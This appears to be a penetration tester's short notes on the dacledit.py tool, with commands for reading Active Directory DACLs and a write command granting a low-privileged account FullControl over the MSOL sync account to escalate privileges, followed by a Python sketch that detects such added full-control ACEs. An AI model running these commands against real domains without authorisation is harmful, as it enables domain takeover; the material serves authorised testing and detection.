# dacledit.py
This helps read/write DACLs!
## Read DACL permissions that a specific principal has on a machine
dacledit.py -action 'read' -principal lowpriv -target 'DC-01$' 'domain.com'/'user':'SecurePa$$!' -debug > dc-01.txt
TIP: I learned sometimes this query comes up empty, so you can try the more general query below to see ALL DACLs on a target.
## Read DACL permissions (general)
See what DACLs are applied to an object:
dacledit.py -action 'read' -target 'DC-01$' 'domain.com'/'user':'SecurePa$$!' -debug > dc-01.txt
## Write DACL changes to privesc
This came in real handy in this tale of pentest pwnage where I had full write access to the MSOL-SYNC-ACCOUNT. I used dacledit.py to grant my LOWPRIV account full access to the MSOL-SYNC-ACCOUNT like so:
dacledit.py -action 'write' -rights 'FullControl' -principal lowpriv -target MSOL-SYNC-ACCOUNT -dc-ip 1.2.3.4 'domain.com'/'user':'SecurePa$$!'
The write action made a backup of the DACL by default, but I still made a manual backup first just because I'm paranoid. You know what they say though, right? Two backups are better than no backups!
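Because the write changes the target's DACL, the before and after descriptors are worth comparing during cleanup or detection review. The sketch below is an added example, not part of the original notes or of dacledit.py: it assumes both descriptors are available as SDDL strings, and the function names, sample SDDL and SID are constructed for illustration.

```python
import re

# SDDL right tokens for directory objects and their access-mask bits
RIGHTS = {"CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
          "DT": 0x40, "LO": 0x80, "CR": 0x100, "SD": 0x10000, "RC": 0x20000,
          "WD": 0x40000, "WO": 0x80000, "GA": 0x10000000}
FULL_CONTROL = 0xF01FF      # all directory-object rights plus delete/read/write DACL/owner
GENERIC_ALL = 0x10000000

def mask_of(rights):
    """Convert an SDDL rights field (two-letter tokens or hex) to an access mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for token in re.findall("..", rights):
        mask |= RIGHTS.get(token, 0)
    return mask

def dacl_aces(sddl):
    """Return the DACL's ACEs as a set of (type, mask, object_guid, trustee)."""
    match = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    aces = set()
    if match:
        for ace in re.findall(r"\(([^)]*)\)", match.group(1)):
            f = ace.split(";")
            aces.add((f[0], mask_of(f[2]), f[3], f[5]))
    return aces

def full_control_grants(before, after):
    """Trustees that gained an allow ACE covering full control between two snapshots."""
    added = dacl_aces(after) - dacl_aces(before)
    return sorted(trustee for ace_type, mask, obj, trustee in added
                  if ace_type == "A" and not obj
                  and ((mask & FULL_CONTROL) == FULL_CONTROL or mask & GENERIC_ALL))

# Constructed sample descriptors: AFTER adds one full-control ACE for a made-up SID
BEFORE = "O:DAG:DAD:AI(A;;RPWP;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)"
NEW_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"
AFTER = BEFORE + "(A;;0xf01ff;;;" + NEW_SID + ")"

if __name__ == "__main__":
    for sid in full_control_grants(BEFORE, AFTER):
        print("new full-control ACE for", sid)
```

An empty result after restoring the backup confirms the added ACE is gone.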